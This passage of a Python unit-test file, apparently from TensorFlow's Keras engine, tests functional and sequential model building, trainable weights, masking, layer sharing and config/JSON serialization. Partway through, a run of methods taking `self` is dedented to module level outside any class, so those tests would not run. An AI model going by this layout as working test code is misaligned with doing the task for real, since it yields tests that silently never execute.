    self.assertEqual(network.name, 'dense_network')
    self.assertEqual(len(network.layers), 2)  # InputLayer + Dense
    self.assertEqual(network.layers[1], dense)
    self.assertEqual(network.weights, dense.weights)
    self.assertEqual(network.trainable_weights, dense.trainable_weights)
    self.assertEqual(network.non_trainable_weights, dense.non_trainable_weights)

    # test callability on Input
    x_2 = input_layer_lib.Input(shape=(32,))
    y_2 = network(x_2)
    self.assertEqual(y_2.shape.as_list(), [None, 2])

    # test callability on regular tensor
    x_2 = array_ops.placeholder(dtype='float32', shape=(None, 32))
    y_2 = network(x_2)
    self.assertEqual(y_2.shape.as_list(), [None, 2])

    # test network `trainable` attribute
    network.trainable = False
    self.assertEqual(network.weights, dense.weights)
    self.assertEqual(network.trainable_weights, [])
    self.assertEqual(network.non_trainable_weights,
                     dense.trainable_weights + dense.non_trainable_weights)
  @test_util.run_in_graph_and_eager_modes
  def test_trainable_weights(self):
    """Toggling `trainable` (model-level or layer-level) moves weights
    between the trainable and non-trainable views, for both functional and
    sequential models."""
    a = keras.layers.Input(shape=(2,))
    b = keras.layers.Dense(1)(a)
    model = keras.models.Model(a, b)

    weights = model.weights
    self.assertListEqual(model.trainable_weights, weights)
    self.assertListEqual(model.non_trainable_weights, [])

    model.trainable = False
    self.assertListEqual(model.trainable_weights, [])
    self.assertListEqual(model.non_trainable_weights, weights)

    model.trainable = True
    self.assertListEqual(model.trainable_weights, weights)
    self.assertListEqual(model.non_trainable_weights, [])

    model.layers[1].trainable = False
    self.assertListEqual(model.trainable_weights, [])
    self.assertListEqual(model.non_trainable_weights, weights)

    # sequential model
    model = keras.models.Sequential()
    model.add(keras.layers.Dense(1, input_dim=2))
    weights = model.weights

    self.assertListEqual(model.trainable_weights, weights)
    self.assertListEqual(model.non_trainable_weights, [])

    model.trainable = False
    self.assertListEqual(model.trainable_weights, [])
    self.assertListEqual(model.non_trainable_weights, weights)

    model.trainable = True
    self.assertListEqual(model.trainable_weights, weights)
    self.assertListEqual(model.non_trainable_weights, [])

    model.layers[0].trainable = False
    self.assertListEqual(model.trainable_weights, [])
    self.assertListEqual(model.non_trainable_weights, weights)
  @test_util.run_deprecated_v1
  def test_layer_call_arguments(self):
    """Extra `call` kwargs (here Dropout's training=True) survive model
    re-application and get_config/from_config round-trips."""
    # Test the ability to pass and serialize arguments to `call`.
    inp = keras.layers.Input(shape=(2,))
    x = keras.layers.Dense(3)(inp)
    x = keras.layers.Dropout(0.5)(x, training=True)
    model = keras.models.Model(inp, x)
    # Would be `dropout/cond/Merge` by default
    self.assertTrue(model.output.op.name.endswith('dropout/mul_1'))

    # Test that argument is kept when applying the model
    inp2 = keras.layers.Input(shape=(2,))
    out2 = model(inp2)
    self.assertTrue(out2.op.name.endswith('dropout/mul_1'))

    # Test that argument is kept after loading a model
    config = model.get_config()
    model = keras.models.Model.from_config(config)
    self.assertTrue(model.output.op.name.endswith('dropout/mul_1'))
  def test_node_construction(self):
    """Node bookkeeping (_keras_history, _inbound/_outbound_nodes) and the
    per-node input/output accessors on a layer shared across two inputs."""
    # test basics
    a = keras.layers.Input(shape=(32,), name='input_a')
    b = keras.layers.Input(shape=(32,), name='input_b')

    with self.assertRaises(ValueError):
      _ = keras.layers.Input(shape=(32,), batch_shape=(10, 32))
    with self.assertRaises(ValueError):
      _ = keras.layers.Input(shape=(32,), unknown_kwarg=None)

    self.assertListEqual(a.shape.as_list(), [None, 32])
    a_layer, a_node_index, a_tensor_index = a._keras_history
    b_layer, _, _ = b._keras_history
    self.assertEqual(len(a_layer._inbound_nodes), 1)
    self.assertEqual(a_tensor_index, 0)
    node = a_layer._inbound_nodes[a_node_index]
    self.assertEqual(node.outbound_layer, a_layer)

    # An InputLayer's node has no inbound layers; it is its own input/output.
    self.assertListEqual(node.inbound_layers, [])
    self.assertListEqual(node.input_tensors, [a])
    self.assertListEqual(node.input_shapes, [(None, 32)])
    self.assertListEqual(node.output_tensors, [a])
    self.assertListEqual(node.output_shapes, [(None, 32)])

    dense = keras.layers.Dense(16, name='dense_1')
    a_2 = dense(a)
    b_2 = dense(b)

    # Each application of `dense` creates one inbound node.
    self.assertEqual(len(dense._inbound_nodes), 2)
    self.assertEqual(len(dense._outbound_nodes), 0)
    self.assertEqual(dense._inbound_nodes[0].inbound_layers, a_layer)
    self.assertEqual(dense._inbound_nodes[0].outbound_layer, dense)
    self.assertEqual(dense._inbound_nodes[1].inbound_layers, b_layer)
    self.assertEqual(dense._inbound_nodes[1].outbound_layer, dense)
    self.assertEqual(dense._inbound_nodes[0].input_tensors, a)
    self.assertEqual(dense._inbound_nodes[1].input_tensors, b)

    # test layer properties
    test_layer = keras.layers.Dense(16, name='test_layer')
    a_test = test_layer(a)
    self.assertListEqual(test_layer.kernel.shape.as_list(), [32, 16])
    self.assertEqual(test_layer.input, a)
    self.assertEqual(test_layer.output, a_test)
    self.assertEqual(test_layer.input_shape, (None, 32))
    self.assertEqual(test_layer.output_shape, (None, 16))

    self.assertEqual(dense.get_input_at(0), a)
    self.assertEqual(dense.get_input_at(1), b)
    self.assertEqual(dense.get_output_at(0), a_2)
    self.assertEqual(dense.get_output_at(1), b_2)
    self.assertEqual(dense.get_input_shape_at(0), (None, 32))
    self.assertEqual(dense.get_input_shape_at(1), (None, 32))
    self.assertEqual(dense.get_output_shape_at(0), (None, 16))
    self.assertEqual(dense.get_output_shape_at(1), (None, 16))
    self.assertEqual(dense.get_input_mask_at(0), None)
    self.assertEqual(dense.get_input_mask_at(1), None)
    self.assertEqual(dense.get_output_mask_at(0), None)
    self.assertEqual(dense.get_output_mask_at(1), None)
  @test_util.run_in_graph_and_eager_modes()
  def test_multi_input_layer(self):
    """Build, run, and JSON-round-trip a two-input functional model with a
    shared Dense layer feeding a concatenate merge."""
    with self.cached_session():
      # test multi-input layer
      a = keras.layers.Input(shape=(32,), name='input_a')
      b = keras.layers.Input(shape=(32,), name='input_b')

      dense = keras.layers.Dense(16, name='dense_1')
      a_2 = dense(a)
      b_2 = dense(b)

      merged = keras.layers.concatenate([a_2, b_2], name='merge')
      self.assertListEqual(merged.shape.as_list(), [None, 16 * 2])
      merge_layer, merge_node_index, merge_tensor_index = merged._keras_history

      self.assertEqual(merge_node_index, 0)
      self.assertEqual(merge_tensor_index, 0)

      self.assertEqual(len(merge_layer._inbound_nodes), 1)
      self.assertEqual(len(merge_layer._outbound_nodes), 0)

      self.assertEqual(len(merge_layer._inbound_nodes[0].input_tensors), 2)
      self.assertEqual(len(merge_layer._inbound_nodes[0].inbound_layers), 2)

      c = keras.layers.Dense(64, name='dense_2')(merged)
      d = keras.layers.Dense(5, name='dense_3')(c)

      model = keras.models.Model(inputs=[a, b], outputs=[c, d], name='model')
      self.assertEqual(len(model.layers), 6)
      output_shapes = model.compute_output_shape([(None, 32), (None, 32)])
      self.assertListEqual(output_shapes[0].as_list(), [None, 64])
      self.assertListEqual(output_shapes[1].as_list(), [None, 5])
      self.assertListEqual(
          model.compute_mask([a, b], [None, None]), [None, None])

      # we don't check names of first 2 layers (inputs) because
      # ordering of same-level layers is not fixed
      self.assertListEqual([l.name for l in model.layers][2:],
                           ['dense_1', 'merge', 'dense_2', 'dense_3'])
      self.assertListEqual([l.name for l in model._input_layers],
                           ['input_a', 'input_b'])
      self.assertListEqual([l.name for l in model._output_layers],
                           ['dense_2', 'dense_3'])

      # actually run model
      fn = keras.backend.function(model.inputs, model.outputs)
      input_a_np = np.random.random((10, 32))
      input_b_np = np.random.random((10, 32))
      fn_outputs = fn([input_a_np, input_b_np])
      self.assertListEqual([x.shape for x in fn_outputs], [(10, 64), (10, 5)])

      # test get_source_inputs
      self.assertListEqual(keras.engine.get_source_inputs(c), [a, b])

      # serialization / deserialization
      json_config = model.to_json()
      recreated_model = keras.models.model_from_json(json_config)
      recreated_model.compile('rmsprop', 'mse')

      self.assertListEqual([l.name for l in recreated_model.layers][2:],
                           ['dense_1', 'merge', 'dense_2', 'dense_3'])
      self.assertListEqual([l.name for l in recreated_model._input_layers],
                           ['input_a', 'input_b'])
      self.assertListEqual([l.name for l in recreated_model._output_layers],
                           ['dense_2', 'dense_3'])

      fn = keras.backend.function(recreated_model.inputs,
                                  recreated_model.outputs)
      input_a_np = np.random.random((10, 32))
      input_b_np = np.random.random((10, 32))
      fn_outputs = fn([input_a_np, input_b_np])
      self.assertListEqual([x.shape for x in fn_outputs], [(10, 64), (10, 5)])
  def test_multi_output_layer_output_names(self):
    """Output names for a multi-output layer are auto-deduplicated
    ('out', 'out_1')."""
    inp = keras.layers.Input(name='inp', shape=(None,), dtype=dtypes.float32)

    class _MultiOutput(keras.layers.Layer):

      def call(self, x):
        return x + 1., x + 2.

    out = _MultiOutput(name='out')(inp)
    model = keras.models.Model(inp, out)
    self.assertEqual(['out', 'out_1'], model.output_names)
    self.assertAllClose([2., 3.], model(1.))
  @test_util.run_deprecated_v1
  def test_recursion(self):
    """Calling a Model on fresh inputs nests it as a layer; the composite
    model can be run, have its outputs manipulated separately, and be
    round-tripped via get_config/from_config."""
    with self.cached_session():
      a = keras.layers.Input(shape=(32,), name='input_a')
      b = keras.layers.Input(shape=(32,), name='input_b')

      dense = keras.layers.Dense(16, name='dense_1')
      a_2 = dense(a)
      b_2 = dense(b)
      merged = keras.layers.concatenate([a_2, b_2], name='merge')
      c = keras.layers.Dense(64, name='dense_2')(merged)
      d = keras.layers.Dense(5, name='dense_3')(c)

      model = keras.models.Model(inputs=[a, b], outputs=[c, d], name='model')

      e = keras.layers.Input(shape=(32,), name='input_e')
      f = keras.layers.Input(shape=(32,), name='input_f')
      self.assertEqual(len(model.inputs), 2)
      g, h = model([e, f])
      # Re-calling the model must not grow its own inputs.
      self.assertEqual(len(model.inputs), 2)
      self.assertEqual(g.name, 'model/dense_2/BiasAdd:0')

      self.assertListEqual(g.shape.as_list(), c.shape.as_list())
      self.assertListEqual(h.shape.as_list(), d.shape.as_list())

      # test separate manipulation of different layer outputs
      i = keras.layers.Dense(7, name='dense_4')(h)

      final_model = keras.models.Model(
          inputs=[e, f], outputs=[i, g], name='final')
      self.assertEqual(len(final_model.inputs), 2)
      self.assertEqual(len(final_model.outputs), 2)
      self.assertEqual(len(final_model.layers), 4)

      # we don't check names of first 2 layers (inputs) because
      # ordering of same-level layers is not fixed
      self.assertListEqual([layer.name for layer in final_model.layers][2:],
                           ['model', 'dense_4'])
      self.assertListEqual(
          model.compute_mask([e, f], [None, None]), [None, None])
      self.assertListEqual(
          final_model.compute_output_shape([(10, 32), (10, 32)]), [(10, 7),
                                                                   (10, 64)])

      # run recursive model
      fn = keras.backend.function(final_model.inputs, final_model.outputs)
      input_a_np = np.random.random((10, 32))
      input_b_np = np.random.random((10, 32))
      fn_outputs = fn([input_a_np, input_b_np])
      self.assertListEqual([x.shape for x in fn_outputs], [(10, 7), (10, 64)])

      # test serialization
      model_config = final_model.get_config()
      recreated_model = keras.models.Model.from_config(model_config)

      fn = keras.backend.function(recreated_model.inputs,
                                  recreated_model.outputs)
      input_a_np = np.random.random((10, 32))
      input_b_np = np.random.random((10, 32))
      fn_outputs = fn([input_a_np, input_b_np])
      self.assertListEqual([x.shape for x in fn_outputs], [(10, 7), (10, 64)])
@test_util.run_in_graph_and_eager_modes()
def test_multi_input_multi_output_recursion(self):
  """Reusing subsets of a multi-output model's outputs in a new graph."""
  with self.cached_session():
    # test multi-input multi-output
    a = keras.layers.Input(shape=(32,), name='input_a')
    b = keras.layers.Input(shape=(32,), name='input_b')
    dense = keras.layers.Dense(16, name='dense_1')
    a_2 = dense(a)
    b_2 = dense(b)
    merged = keras.layers.concatenate([a_2, b_2], name='merge')
    c = keras.layers.Dense(64, name='dense_2')(merged)
    d = keras.layers.Dense(5, name='dense_3')(c)
    model = keras.models.Model(inputs=[a, b], outputs=[c, d], name='model')

    # Call the inner model twice, keeping a different output each time.
    j = keras.layers.Input(shape=(32,), name='input_j')
    k = keras.layers.Input(shape=(32,), name='input_k')
    _, n = model([j, k])

    o = keras.layers.Input(shape=(32,), name='input_o')
    p = keras.layers.Input(shape=(32,), name='input_p')
    q, _ = model([o, p])

    self.assertListEqual(n.shape.as_list(), [None, 5])
    self.assertListEqual(q.shape.as_list(), [None, 64])
    s = keras.layers.concatenate([n, q], name='merge_nq')
    self.assertListEqual(s.shape.as_list(), [None, 64 + 5])

    # test with single output as 1-elem list
    multi_io_model = keras.models.Model([j, k, o, p], [s])

    fn = keras.backend.function(multi_io_model.inputs, multi_io_model.outputs)
    fn_outputs = fn([
        np.random.random((10, 32)), np.random.random((10, 32)),
        np.random.random((10, 32)), np.random.random((10, 32))
    ])
    self.assertListEqual([x.shape for x in fn_outputs], [(10, 69)])

    # test with single output as tensor
    multi_io_model = keras.models.Model([j, k, o, p], s)

    fn = keras.backend.function(multi_io_model.inputs, multi_io_model.outputs)
    fn_outputs = fn([
        np.random.random((10, 32)), np.random.random((10, 32)),
        np.random.random((10, 32)), np.random.random((10, 32))
    ])
    # note that the output of the function will still be a 1-elem list
    self.assertListEqual([x.shape for x in fn_outputs], [(10, 69)])

    # test serialization
    model_config = multi_io_model.get_config()
    recreated_model = keras.models.Model.from_config(model_config)

    fn = keras.backend.function(recreated_model.inputs,
                                recreated_model.outputs)
    fn_outputs = fn([
        np.random.random((10, 32)), np.random.random((10, 32)),
        np.random.random((10, 32)), np.random.random((10, 32))
    ])
    # note that the output of the function will still be a 1-elem list
    self.assertListEqual([x.shape for x in fn_outputs], [(10, 69)])

    # Smoke-test the remaining serialization surfaces on the inner model.
    config = model.get_config()
    keras.models.Model.from_config(config)

    model.summary()
    json_str = model.to_json()
    keras.models.model_from_json(json_str)

    if yaml is not None:
      yaml_str = model.to_yaml()
      keras.models.model_from_yaml(yaml_str)
@test_util.run_in_graph_and_eager_modes()
def test_invalid_graphs(self):
  """Model construction rejects ill-formed input/output specifications."""
  a = keras.layers.Input(shape=(32,), name='input_a')
  b = keras.layers.Input(shape=(32,), name='input_b')
  dense = keras.layers.Dense(16, name='dense_1')
  a_2 = dense(a)
  b_2 = dense(b)
  merged = keras.layers.concatenate([a_2, b_2], name='merge')
  c = keras.layers.Dense(64, name='dense_2')(merged)
  d = keras.layers.Dense(5, name='dense_3')(c)
  model = keras.models.Model(inputs=[a, b], outputs=[c, d], name='model')

  # input is not an Input tensor
  j = keras.layers.Input(shape=(32,), name='input_j')
  j = keras.layers.Dense(32)(j)
  k = keras.layers.Input(shape=(32,), name='input_k')
  m, n = model([j, k])

  with self.assertRaises(Exception):
    keras.models.Model([j, k], [m, n])

  # disconnected graph
  j = keras.layers.Input(shape=(32,), name='input_j')
  k = keras.layers.Input(shape=(32,), name='input_k')
  m, n = model([j, k])
  with self.assertRaises(Exception):
    keras.models.Model([j], [m, n])

  # redundant outputs: listing the same output twice is tolerated
  j = keras.layers.Input(shape=(32,), name='input_j')
  k = keras.layers.Input(shape=(32,), name='input_k')
  m, n = model([j, k])
  keras.models.Model([j, k], [m, n, n])

  # redundant inputs
  j = keras.layers.Input(shape=(32,), name='input_j')
  k = keras.layers.Input(shape=(32,), name='input_k')
  m, n = model([j, k])
  with self.assertRaises(Exception):
    keras.models.Model([j, k, j], [m, n])

  # garbage as inputs/outputs (a non-tensor constant in the outputs)
  j = keras.layers.Input(shape=(32,), name='input_j')
  k = keras.layers.Input(shape=(32,), name='input_k')
  m, n = model([j, k])
  with self.assertRaises(Exception):
    keras.models.Model([j, k], [m, n, 0])
@test_util.run_deprecated_v1
def test_raw_tf_compatibility(self):
  """Keras layers and models accept raw TF placeholder tensors."""
  # test calling layers/models on TF tensors
  a = keras.layers.Input(shape=(32,), name='input_a')
  b = keras.layers.Input(shape=(32,), name='input_b')
  dense = keras.layers.Dense(16, name='dense_1')
  a_2 = dense(a)
  b_2 = dense(b)
  merged = keras.layers.concatenate([a_2, b_2], name='merge')
  c = keras.layers.Dense(64, name='dense_2')(merged)
  d = keras.layers.Dense(5, name='dense_3')(c)
  model = keras.models.Model(inputs=[a, b], outputs=[c, d], name='model')

  j = keras.layers.Input(shape=(32,), name='input_j')
  k = keras.layers.Input(shape=(32,), name='input_k')
  self.assertEqual(len(model.inputs), 2)
  m, n = model([j, k])
  self.assertEqual(len(model.inputs), 2)
  tf_model = keras.models.Model([j, k], [m, n])

  # Call the Keras-built model on raw placeholders.
  j_tf = array_ops.placeholder(dtype=dtypes.float32, shape=(None, 32))
  k_tf = array_ops.placeholder(dtype=dtypes.float32, shape=(None, 32))
  m_tf, n_tf = tf_model([j_tf, k_tf])
  self.assertListEqual(m_tf.shape.as_list(), [None, 64])
  self.assertListEqual(n_tf.shape.as_list(), [None, 5])

  # test merge
  keras.layers.concatenate([j_tf, k_tf], axis=1)
  keras.layers.add([j_tf, k_tf])

  # test tensor input
  x = array_ops.placeholder(shape=(None, 2), dtype=dtypes.float32)
  keras.layers.InputLayer(input_tensor=x)

  x = keras.layers.Input(tensor=x)
  keras.layers.Dense(2)(x)
@test_util.run_in_graph_and_eager_modes()
def test_basic_masking(self):
  """A Masking layer yields a (batch, time) output mask on the model."""
  inputs = keras.layers.Input(shape=(10, 32), name='input_a')
  masked = keras.layers.Masking()(inputs)
  net = keras.models.Model(inputs, masked)
  self.assertEqual(net.output_mask.shape.as_list(), [None, 10])
@test_util.run_deprecated_v1
def testMaskingSingleInput(self):
  """Mask propagation for a layer that both consumes and emits a mask."""

  class MaskedLayer(keras.layers.Layer):

    def call(self, inputs, mask=None):
      if mask is not None:
        return inputs * mask
      return inputs

    def compute_mask(self, inputs, mask=None):
      # Always emits an all-ones mask shaped like the inputs.
      return array_ops.ones_like(inputs)

  if context.executing_eagerly():
    a = constant_op.constant([2] * 32)
    mask = constant_op.constant([0, 1] * 16)
    # Attach a mask directly to the eager tensor.
    a._keras_mask = mask
    b = MaskedLayer().apply(a)
    self.assertTrue(hasattr(b, '_keras_mask'))
    self.assertAllEqual(
        self.evaluate(array_ops.ones_like(mask)),
        self.evaluate(getattr(b, '_keras_mask')))
    self.assertAllEqual(self.evaluate(a * mask), self.evaluate(b))
  else:
    x = input_layer_lib.Input(shape=(32,))
    y = MaskedLayer()(x)  # pylint: disable=not-callable
    network = network_lib.Network(x, y)

    # test callability on Input
    x_2 = input_layer_lib.Input(shape=(32,))
    y_2 = network(x_2)
    self.assertEqual(y_2.shape.as_list(), [None, 32])

    # test callability on regular tensor
    x_2 = array_ops.placeholder(dtype='float32', shape=(None, 32))
    y_2 = network(x_2)
    self.assertEqual(y_2.shape.as_list(), [None, 32])
@test_util.run_deprecated_v1
def test_activity_regularization_with_model_composition(self):
  """Activity regularizers survive wrapping one model inside another."""

  def sum_reg(t):
    return math_ops.reduce_sum(t)

  inner_in = input_layer_lib.Input((2,))
  inner_out = keras.layers.Dense(
      2,
      kernel_initializer='ones',
      use_bias=False,
      activity_regularizer=sum_reg)(inner_in)
  inner = keras.Model([inner_in], [inner_out])

  outer_in = input_layer_lib.Input((2,))
  outer = keras.Model([outer_in], [inner(outer_in)])
  outer.compile(optimizer='sgd', loss=None)

  # ones(1, 2) through an all-ones 2x2 kernel sums to 4.
  loss = outer.evaluate(np.ones((1, 2)))
  self.assertEqual(loss, 4.)
@keras_parameterized.run_all_keras_modes
def test_layer_sharing_at_heterogenous_depth(self):
  """Shared layers used at several depths round-trip through get_config."""
  inputs = input_layer_lib.Input(shape=(5,))
  first = keras.layers.Dense(5, name='A')
  second = keras.layers.Dense(5, name='B')
  # Alternate the two shared layers: A(B(A(B(x)))).
  outputs = first(second(first(second(inputs))))
  model = keras.models.Model(inputs, outputs)
  model.run_eagerly = testing_utils.should_run_eagerly()

  sample = np.random.random((10, 5))
  expected = model.predict(sample)

  clone = keras.models.Model.from_config(model.get_config())
  clone.set_weights(model.get_weights())
  self.assertAllClose(expected, clone.predict(sample), atol=1e-6)
@keras_parameterized.run_all_keras_modes
def test_layer_sharing_at_heterogenous_depth_with_concat(self):
  """A layer shared across two concatenated branches survives config round-trip."""
  feature_shape = (16, 9, 3)
  inputs = input_layer_lib.Input(shape=feature_shape)
  shared = keras.layers.Dense(3, name='dense_A')
  left_tail = keras.layers.Dense(3, name='dense_B')
  right_head = keras.layers.Dense(3, name='dense_C')
  # `shared` sits at depth 1 on the left branch and depth 2 on the right.
  left = left_tail(shared(inputs))
  right = shared(right_head(inputs))
  merged = keras.layers.concatenate([left, right])
  model = keras.models.Model(inputs=inputs, outputs=merged)
  model.run_eagerly = testing_utils.should_run_eagerly()

  batch = np.random.random((10, 16, 9, 3))
  expected = model.predict(batch)

  clone = keras.models.Model.from_config(model.get_config())
  clone.set_weights(model.get_weights())
  self.assertAllClose(expected, clone.predict(batch), atol=1e-6)
@keras_parameterized.run_all_keras_modes
def test_explicit_training_argument(self):
  """`training=` passed at call time pins the phase of a nested model."""
  inner_in = keras.layers.Input(shape=(2,))
  inner_out = keras.layers.Dropout(0.5)(inner_in)
  base_model = keras.models.Model(inner_in, inner_out)

  # Inference mode: dropout disabled, so the wrapper is the identity.
  infer_in = keras.layers.Input(shape=(2,))
  model = keras.models.Model(infer_in, base_model(infer_in, training=False))

  x = np.ones((100, 2))
  y = np.ones((100, 2))
  model.compile(
      optimizer='sgd',
      loss='mse',
      run_eagerly=testing_utils.should_run_eagerly())
  loss = model.train_on_batch(x, y)
  self.assertEqual(loss, 0)  # In inference mode, output is equal to input.

  # Training mode: dropout stays active even during predict().
  train_in = keras.layers.Input(shape=(2,))
  train_model = keras.models.Model(train_in,
                                   base_model(train_in, training=True))
  preds = train_model.predict(x)
  self.assertEqual(np.min(preds), 0.)  # At least one unit was dropped.
@keras_parameterized.run_all_keras_modes
def test_multi_output_model_with_none_masking(self):
  """A Lambda returning a list of tensors; masks default to None.

  Fix: replaced a bare `assert` on the predicted shape with
  `self.assertEqual` -- bare asserts are stripped under `python -O`
  and give no diagnostics on failure.
  """

  def func(x):
    return [x * 0.2, x * 0.3]

  def output_shape(input_shape):
    # One output shape per returned tensor.
    return [input_shape, input_shape]

  i = keras.layers.Input(shape=(3, 2, 1))
  o = keras.layers.Lambda(function=func, output_shape=output_shape)(i)

  self.assertEqual(keras.backend.int_shape(o[0]), (None, 3, 2, 1))
  self.assertEqual(keras.backend.int_shape(o[1]), (None, 3, 2, 1))

  o = keras.layers.add(o)
  model = keras.Model(i, o)
  model.run_eagerly = testing_utils.should_run_eagerly()

  # Nest the model and make sure masks (None) flow through cleanly.
  i2 = keras.layers.Input(shape=(3, 2, 1))
  o2 = model(i2)
  model2 = keras.Model(i2, o2)
  model2.run_eagerly = testing_utils.should_run_eagerly()

  x = np.random.random((4, 3, 2, 1))
  out = model2.predict(x)
  self.assertEqual(out.shape, (4, 3, 2, 1))
  self.assertAllClose(out, x * 0.2 + x * 0.3, atol=1e-4)
@keras_parameterized.run_all_keras_modes
def test_constant_initializer_with_numpy(self):
  """A numpy-backed Constant initializer serializes to JSON and YAML."""
  init = keras.initializers.Constant(np.ones((3, 2)))
  model = keras.models.Sequential()
  model.add(
      keras.layers.Dense(2, input_shape=(3,), kernel_initializer=init))
  model.add(keras.layers.Dense(3))
  model.compile(
      loss='mse',
      optimizer='sgd',
      metrics=['acc'],
      run_eagerly=testing_utils.should_run_eagerly())

  # Round-trip through both text serialization formats.
  serialized = model.to_json()
  keras.models.model_from_json(serialized)

  if yaml is not None:
    keras.models.model_from_yaml(model.to_yaml())
def test_subclassed_error_if_init_not_called(self):
  """Creating layers before Network.__init__ raises a helpful error."""

  class _Broken(network_lib.Network):

    def __init__(self):
      # Deliberately never calls super().__init__().
      self._foo = [keras.layers.Dense(10), keras.layers.Dense(10)]

  with self.assertRaisesRegexp(RuntimeError, 'forgot to call'):
    _Broken()
@test_util.run_in_graph_and_eager_modes()
def test_int_input_shape(self):
  """keras.Input accepts bare ints for `shape` and `batch_size`."""
  no_batch = keras.Input(10)
  self.assertEqual([None, 10], no_batch.shape.as_list())

  with_batch = keras.Input(batch_size=20, shape=5)
  self.assertEqual([20, 5], with_batch.shape.as_list())
@test_util.run_in_graph_and_eager_modes()
def test_model_initialization(self):
  """Constructor kwargs accepted by functional vs. subclassed Models."""
  # Functional model
  inputs = input_layer_lib.Input(shape=(32,))
  outputs = keras.layers.Dense(4)(inputs)
  # Functional models reject `dtype` and `dynamic` constructor kwargs.
  with self.assertRaisesRegexp(TypeError, 'unexpected argument'):
    model = training.Model(inputs, outputs, name='m', trainable=False,
                           dtype='int64')
  with self.assertRaisesRegexp(TypeError, 'unexpected argument'):
    model = training.Model(inputs, outputs, name='m', trainable=False,
                           dynamic=False)

  model = training.Model(inputs, outputs, name='m', trainable=False)
  self.assertEqual('m', model.name)
  self.assertFalse(model.trainable)
  self.assertFalse(model.dynamic)

  # Subclassed model: the same kwargs are accepted here.
  model = training.Model(name='subclassed', trainable=True, dtype='int64',
                         dynamic=True)
  self.assertEqual('subclassed', model.name)
  self.assertTrue(model.dynamic)
  self.assertTrue(model.trainable)
  w = model.add_weight('w', [], initializer=keras.initializers.Constant(1))
  self.assertEqual(dtypes.int64, w.dtype)
class DeferredModeTest(test.TestCase):
  """Building networks from symbolic inputs, then calling them eagerly."""

  @test_util.run_in_graph_and_eager_modes()
  def testSimpleNetworkBuilding(self):
    inputs = input_layer_lib.Input(shape=(32,))
    if context.executing_eagerly():
      self.assertEqual(inputs.dtype.name, 'float32')
      self.assertEqual(inputs.shape.as_list(), [None, 32])

    x = keras.layers.Dense(2)(inputs)
    if context.executing_eagerly():
      self.assertEqual(x.dtype.name, 'float32')
      self.assertEqual(x.shape.as_list(), [None, 2])

    outputs = keras.layers.Dense(4)(x)
    network = network_lib.Network(inputs, outputs)
    self.assertIsInstance(network, network_lib.Network)

    if context.executing_eagerly():
      # It should be possible to call such a network on EagerTensors.
      inputs = constant_op.constant(
          np.random.random((10, 32)).astype('float32'))
      outputs = network(inputs)
      self.assertEqual(outputs.shape.as_list(), [10, 4])

  @test_util.run_in_graph_and_eager_modes()
  def testMultiIONetworkBuilding(self):
    input_a = input_layer_lib.Input(shape=(32,))
    input_b = input_layer_lib.Input(shape=(16,))
    a = keras.layers.Dense(16)(input_a)

    class AddLayer(keras.layers.Layer):

      def call(self, inputs):
        # Expects a 2-element list of tensors.
        return inputs[0] + inputs[1]

    c = AddLayer()([a, input_b])  # pylint: disable=not-callable
    c = keras.layers.Dense(2)(c)

    # Note: `a` is both an intermediate tensor and a network output.
    network = network_lib.Network([input_a, input_b], [a, c])
    if context.executing_eagerly():
      a_val = constant_op.constant(
          np.random.random((10, 32)).astype('float32'))
      b_val = constant_op.constant(
          np.random.random((10, 16)).astype('float32'))
      outputs = network([a_val, b_val])
      self.assertEqual(len(outputs), 2)
      self.assertEqual(outputs[0].shape.as_list(), [10, 16])
      self.assertEqual(outputs[1].shape.as_list(), [10, 2])
class DefaultShapeInferenceBehaviorTest(keras_parameterized.TestCase):
  """Default shape inference for layers/models without static shape info."""

  def _testShapeInference(self, model, input_shape, expected_output_shape):
    # Helper: push a random batch through `model`, check the output shape.
    input_value = np.random.random(input_shape)
    output_value = model.predict(input_value)
    self.assertEqual(output_value.shape, expected_output_shape)

  @test_util.run_in_graph_and_eager_modes()
  def testSingleInputCase(self):

    class LayerWithOneInput(keras.layers.Layer):

      def build(self, input_shape):
        self.w = array_ops.ones(shape=(3, 4))

      def call(self, inputs):
        return keras.backend.dot(inputs, self.w)

    inputs = input_layer_lib.Input(shape=(3,))
    layer = LayerWithOneInput()

    if context.executing_eagerly():
      self.assertEqual(
          layer.compute_output_shape((None, 3)).as_list(), [None, 4])
      # As a side-effect, compute_output_shape builds the layer.
      self.assertTrue(layer.built)
      # We can still query the layer's compute_output_shape with compatible
      # input shapes.
      self.assertEqual(
          layer.compute_output_shape((6, 3)).as_list(), [6, 4])

    outputs = layer(inputs)
    model = keras.Model(inputs, outputs)
    self._testShapeInference(model, (2, 3), (2, 4))

  @test_util.run_in_graph_and_eager_modes()
  def testMultiInputOutputCase(self):

    class MultiInputOutputLayer(keras.layers.Layer):

      def build(self, input_shape):
        self.w = array_ops.ones(shape=(3, 4))

      def call(self, inputs):
        a = keras.backend.dot(inputs[0], self.w)
        b = a + inputs[1]
        return [a, b]

    input_a = input_layer_lib.Input(shape=(3,))
    input_b = input_layer_lib.Input(shape=(4,))
    output_a, output_b = MultiInputOutputLayer()([input_a, input_b])
    model = keras.Model([input_a, input_b], [output_a, output_b])
    output_a_val, output_b_val = model.predict(
        [np.random.random((2, 3)), np.random.random((2, 4))])
    self.assertEqual(output_a_val.shape, (2, 4))
    self.assertEqual(output_b_val.shape, (2, 4))

  @test_util.run_in_graph_and_eager_modes()
  def testTrainingArgument(self):

    class LayerWithTrainingArg(keras.layers.Layer):

      def build(self, input_shape):
        self.w = array_ops.ones(shape=(3, 4))

      def call(self, inputs, training):
        # `training` is accepted but unused; shape inference must still work.
        return keras.backend.dot(inputs, self.w)

    inputs = input_layer_lib.Input(shape=(3,))
    outputs = LayerWithTrainingArg()(inputs, training=False)
    model = keras.Model(inputs, outputs)
    self._testShapeInference(model, (2, 3), (2, 4))

  @test_util.run_in_graph_and_eager_modes()
  def testNoneInShape(self):

    class Model(keras.Model):

      def __init__(self):
        super(Model, self).__init__()
        self.conv1 = keras.layers.Conv2D(8, 3)
        self.pool = keras.layers.GlobalAveragePooling2D()
        self.fc = keras.layers.Dense(3)

      def call(self, x):
        x = self.conv1(x)
        x = self.pool(x)
        x = self.fc(x)
        return x

    model = Model()
    # Build with fully unknown spatial dims.
    model.build(tensor_shape.TensorShape((None, None, None, 1)))
    self.assertTrue(model.built, 'Model should be built')
    self.assertTrue(model.weights,
                    'Model should have its weights created as it '
                    'has been built')
    sample_input = array_ops.ones((1, 10, 10, 1))
    output = model(sample_input)
    self.assertEqual(output.shape, (1, 3))

  @test_util.run_in_graph_and_eager_modes()
